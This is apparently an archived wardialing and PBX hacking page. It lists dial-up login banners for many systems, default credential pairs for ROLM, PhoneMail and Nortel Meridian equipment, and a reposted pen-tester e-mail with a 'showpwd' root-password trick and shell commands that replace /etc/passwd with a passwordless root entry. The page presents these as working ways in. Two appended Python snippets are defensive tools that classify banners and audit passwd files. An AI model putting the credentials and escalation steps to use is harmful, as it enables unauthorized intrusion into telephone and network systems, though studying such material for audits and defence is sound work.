Banner Contributions from the White Hat community are posted below. Keep them coming. The banners right below are from my experiences.
This dial-up domain tends to be the one that takes the least amount of time, and if you are lucky it provides instant gratification. It requires no scripting, so essentially it is a guessing process. It would be impossible to list all of the common ids and passwords used for all the dial-in capable systems. Lists and references abound; see the left frame for some links. Here is another from mksecure.
Once again, experience from seeing a multitude of results from wardialing and playing with the resulting pool of potential systems will help immensely. The ability to identify the signature or screen of a type of dial-up system gives you the basis for where to start with the default userids or passwords for that system. Whichever list you consult, the key here is to spend no more than the time required to exhaust the possibilities for default ids and passwords, and then, if unsuccessful, move on to the next domain.
Stay tuned for a page devoted to screen prints of what the system login prompts look like.
I'm constantly updating: if you have anything, let me know.
PC ANYWHERE
(should be called PC Everywhere)
30-Jun-XX 13:24:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Please press <Enter>...
All you have to do here is have a copy of PC ANYWHERE, dial back the target and see what happens ;>
There are different modes, so if it is encrypted it could be tougher, etc...
CISCO
30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
User Access Verification
Password:
Password:
Password:
% Bad passwords
+++
This is typically Cisco. If you luck out and get in with a password, you are dropped into a prompt:
RouterA123XX>
Sometimes the person dialing into the router leaves the router in an active state because they did not log out gracefully:
30-Jun-XX 13:25:55 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
RouterB345XX>
If this happens, do a SHOW CON or type ? and take it from there.
BAYNETWORKS
30-Jun-XX 13:26:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Bay Networks, Inc. and its Licensors.
Copyright 1992,1993,1994,1995,1996,1997,1998. All rights reserved.
Login:
01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Annex Command Line Interpreter *
Copyright (C) 1988, 1998 Bay Networks
Checking authorization, Please wait...
Annex username:
01-Jul-XX 21:55:39 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Annex Command Line Interpreter * Copyright (C) 1988, 1997 Bay Networks
annex:
Consult your favorite default password list
SHIVA LAN ROVERS
30-Jun-XX 16:40:13 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
Consult your favorite default password list
IBM AIX
30-Jun-XX 17:20:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
login:
Try uid: oracle pwd: oracle, or no password, etc.
HP UNIX
30-Jun-XX 17:21:14 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
GenericSysName [HP Release B.10.20] (see /etc/issue)
login:
Consult your favorite default password list
UNIX - VARIOUS
02-Jul-XX 17:28:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
Welcome to SCO UNIX System V/386 Release 3.2
XXXXXX!login:
02-Jul-XX 17:29:27 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM/V42BIS
SCO OpenServer(TM) Release 5 (strXXXX) (tty1A)
*****************************************
****<<Wed Apr XX XX:XX:XX EDT XXXX>>*****
************<< 3.2v5.0.4 >>*************
*****************************************
(Please Use Lower Case Letters!)
login:
02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
The system's name is XXXXXXXX.
Welcome to USL UNIX System V Release 4.2 Version 1
login:
02-Jul-XX 17:39:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Welcome to UnixWare 2.01
The system's name is XXXXXX.
login:
Consult your favorite default password list
ROLM
02-Jul-XX 17:38:16 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
ROLM CBX MODEL 10, 9030A PROCESSOR (Prom Rev 3.4) SITE ID: XXXXXXXX
RELEASE: 9005.6.84 BIND DATE: 27/January/98 12 Megabytes
(C) Copyright 1980-1998 Siemens Rolm Communications Inc. All rights reserved.
ROLM is a registered trademark of Siemens Rolm Communications Inc.
17:38:16 ON Saturday x/xx/xxxx 25 DEGREES C
USERNAME:
PASSWORD:
Not in directory
This is the PBX management console, gang; a few of these uid/pwd combos still work:
admin pwp
eng engineer
op op
op operartor
su super
Or you might see the failure this way:
USERNAME:
PASSWORD:
INVALID USERNAME-PASSWORD PAIR.
ROLM SIEMENS PHONE MAIL
Login:
Password:
ROLM Phonemail Version 6.4
Login:
Password
ROLM Phonemail Version 6.4
(C) Copyright 1989-2000 Siemens I & C Networks, Inc. All Rights Reserved
!!!
ROLM Phonemail Site ID: xxxxxxxxxx
PhoneMail release 6.4.3
CPU Type of local node is GenuineIntel 80586 133mhz
?Phonemail is active with 16 Channels
Function:
Friday Feb 2, 2002 4:15 AM
sysadmin / sysadmin is a good place to start on the uid/pwd pair ;>
SECURE ID
Hello
Password :
58945664 :
Hello
Password :
16232368 :
Hello
Password :
77856559 :
Your access is denied, Good Bye.
(If you see this you might want to forget it; this is challenge-response, so it will be nearly impossible to get past an RSA SecurID token.)
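As an added example (my own code, not from this page), here is a small parser for capture logs in the format shown above. It labels each connection by its banner so a team reviewing an authorized audit of its own dial-in lines can see which ones still present a static password prompt (the default-credential case) versus a challenge-response screen. The signatures are regexes I derived from the screens above and are assumptions, not a vendor list.

```python
import re
from typing import Dict, List

# Signatures derived from the screens shown above; the regexes are mine, not the page's.
# Checked in order, first match wins, so specific patterns come before generic ones.
SIGNATURES = [
    ("Cisco IOS",          r"User Access Verification"),
    ("Bay Networks Annex", r"Annex Command Line Interpreter"),
    ("Shiva LanRover",     r"^@ Userid:"),
    ("ROLM CBX",           r"ROLM CBX"),
    ("ROLM PhoneMail",     r"Phone[Mm]ail"),
    ("RSA SecurID prompt", r"^\d{8} :|Your access is denied"),
    ("PC Anywhere",        r"Please press <Enter>"),
    ("Unix login",         r"AIX Version|HP Release|SCO (UNIX|OpenServer)|UnixWare|USL UNIX"),
]

# Capture header line, e.g. "30-Jun-XX 13:24:40 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM"
CONNECT_RE = re.compile(r"^(?P<date>\S+) (?P<time>\d\d:\d\d:\d\d) (?P<number>\S+) C: "
                        r"CONNECT (?P<speed>\d+)(?P<proto>(?:/[A-Z0-9]+)*)\s*$")

def classify_banner(banner: str) -> str:
    for label, pattern in SIGNATURES:
        if re.search(pattern, banner, re.MULTILINE):
            return label
    return "unknown"

def parse_capture(text: str) -> List[Dict[str, object]]:
    """One record per CONNECT line, classifying the banner text that follows it. 'review' is
    True for a static password prompt, False for challenge-response (SecurID) or unknown."""
    lines = text.splitlines()
    starts = [i for i, line in enumerate(lines) if CONNECT_RE.match(line)]
    records = []
    for n, start in enumerate(starts):
        end = starts[n + 1] if n + 1 < len(starts) else len(lines)
        hdr = CONNECT_RE.match(lines[start])
        system = classify_banner("\n".join(lines[start + 1:end]))
        records.append({"number": hdr["number"], "speed": int(hdr["speed"]), "system": system,
                        "review": system not in ("RSA SecurID prompt", "unknown")})
    return records

# Constructed capture (numbers masked as on the page) covering two of the screens above.
SAMPLE_CAPTURE = """\
30-Jun-XX 13:25:45 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
User Access Verification
Password:
02-Jul-XX 09:00:00 91XXXXXXXXXX C: CONNECT 9600/ARQ/V32/LAPM
Hello
Password :
58945664 :
Your access is denied, Good Bye.
"""
```

Feed it the raw capture from your dialer and sort on the "review" key to get the list of lines that need a default-credential check first.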
BANNER (WAR DIAL and PBX) CONTRIBUTIONS SECTION
If you have any contributions feel free to send them along to
If I post your banner or suggestion I certainly point to the credit. Check out the Hacking Meridian section and you can see. Newest data first.
From:
Sacha Faust 4/11/02
sacha@severus.org
Thanks Sacha!
Stephan, From some results I found,
Welcome to USL UNIX System V Release 4.2 Version 1 == AUDIX or its link with some AUDIX system. The "System's name is" part always seems to be set to "Intuity".
Here are some additional banners I found:
1. OpenVMS VAX
Welcome to OpenVMS VAX V6.1
Username:
2. Direct Audix
System name: audix
login:
3. QNX
QNX Version 3.21 Node 0 $tty3 Local Time: XXX
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:
4. QNX (might vary depending on OS version or config)
Copyright (c) Quantum Software Systems Ltd. 1983,1989
Login:
5. CITRIX metaframe (not 100% sure)
ICA
---------
Sacha Faust
sacha@severus.org
HACKING Meridian NEW Feb 2, 2002 for all you GroundHogs :> (this is in the Meridian section also)
Sent in from a fellow pen tester. This stuff does work, because I've gotten in with it. There were a few techniques I was not privy to, so this was GREAT info.
Posted with Permission from Mark A. Rowe at Pentest Limited
Thanks Mark!
----------------------- Email Excerpt -----------------------------
Hi Stephan,
I've just been on your website www.m4phr1k.com which is great. While browsing I noticed that you had started a section on Meridian and thought you might be interested in an email I posted to the pen-test list a while back. At the time HD Moore asked me whether I was going to write it up or put it on a website but I forgot all about it. Anyway, if you didn't already know it and think it is useful, feel free to put it on your site when you have the time. I've never come across a system in the UK where the service account has had its password changed.
The email is below. I'll be looking at an Ericsson MD110 in the next couple of weeks, if I find anything useful I will let you know.
Regards,
Mark.
========================================================================
I came across this while doing a security review 3 years ago. I tried to contact Nortel several times but never received a response. I guess they don't think it is important :-o
If the PBX is hooked into the actual network, there are quite a few ways to get access to the system. The easiest method is to tftp the /etc/passwd file off the system and crack the hashes. If you go this route, you will get a user account called "service" with a password of "smile" ;) If you log into the system with this account, you will notice that /etc is mode 0777, so getting root access is trivial:
$ echo "root::0:0:root:/root:/bin/sh" > /etc/mah_passwd
$ mv /etc/passwd /etc/passwd.bak
$ mv /etc/mah_passwd /etc/passwd
$ su root
# mv /etc/passwd.bak /etc/passwd
I don't remember which version of this system it was, but the client software that came with it was called "Meridian Terminal Emulator". You could manage the PBX with this by first logging in with 0000/0000 then giving it the manager password of "9999". I really wish I had more time to write up the stuff I find out there.
HD
Anyway, I think the service account exists on the MAX, CCR and Link Meridian components.
Here is some other stuff I came across.
Accounts that give UNIX level access:
| BOX | Account | Password | Use |
| MAX, CCR, LINK | service | smile | General Engineer Account |
| CCR, LINK | disttech | 4tas | Engineer Account |
| MAX | root | 3ep5w2u | Root |
Accounts that give application level access:
| BOX | Account | Password | Use |
| MAX | maint | ntacdmax | Maintenance Account |
| CCR, LINK | maint | maint | Maintenance Account |
| CCR | ccrusr | ccrusr | User Account |
| LINK | mlusr | mlusr | User Account |
To gain root access on Link or CCR:
Login as disttech/4tas
type "showpwd"
At the prompt enter the first 3 letters from Yesterday and the first 3 from Tomorrow (e.g. if today is Tuesday enter "MonWed"; note the capitalisation).
When you are told this is invalid, enter the same thing again.
The root password is now displayed in plain text on the screen. You can now "su" to root with this password.
To gain access to the Meridian itself, there are two methods of access depending on how the switch is set up. Try password only first, as most will probably be set up like this:
Password only
enter
logi 0000 (customer level)
logi 1111 (a bit higher)
logi 8429 (maintenance)
Username and password
logi customer
PASS? 0000
logi admin1
PASS? 1111
logi to
PASS? 8429
Hope this helps,
Mark.
--
Mark Rowe
IT Security Consultant
PenTest Limited
www.pentest-limited.com
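The root escalation in Mark's write-up depends on two conditions, a world-writable /etc and a passwd entry with an empty password field (and a second UID 0). As an added example, not part of the e-mail above, here is an audit check for both that an administrator can run against a Meridian component or any other Unix-style host; the sample passwd contents and the "planted" account name are constructed for the demonstration.

```python
import os
import stat
from typing import List, Tuple

# Constructed sample passwd file (not from any real system). "planted" mirrors the entry
# the write-up creates, but under its own name so a genuine root line stays for comparison.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/sh
service:x:100:100:service:/home/service:/bin/sh
planted::0:0:planted:/root:/bin/sh
guest::200:200:guest:/home/guest:/bin/sh
"""

def audit_passwd(text: str) -> List[Tuple[str, str]]:
    """Return (reason, account) findings: an empty password field, or UID 0 under a name
    other than root. Lines that do not have the seven passwd fields are reported, not skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(("MALFORMED_LINE", f"line {lineno}"))
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if pw == "":
            findings.append(("EMPTY_PASSWORD", name))
        if uid == "0" and name != "root":
            findings.append(("EXTRA_UID0", name))
    return findings

def world_writable(path: str) -> bool:
    """True when 'other' has write permission on path (the /etc mode 0777 condition)."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)

if __name__ == "__main__":
    for reason, what in audit_passwd(SAMPLE_PASSWD):
        print(f"{reason:16} {what}")
    print("/etc world-writable on this host:", world_writable("/etc"))
```

On a live host, read /etc/passwd into audit_passwd and treat any EMPTY_PASSWORD or EXTRA_UID0 finding, or a True from world_writable("/etc"), as an indicator that the escalation above is possible or has already been used.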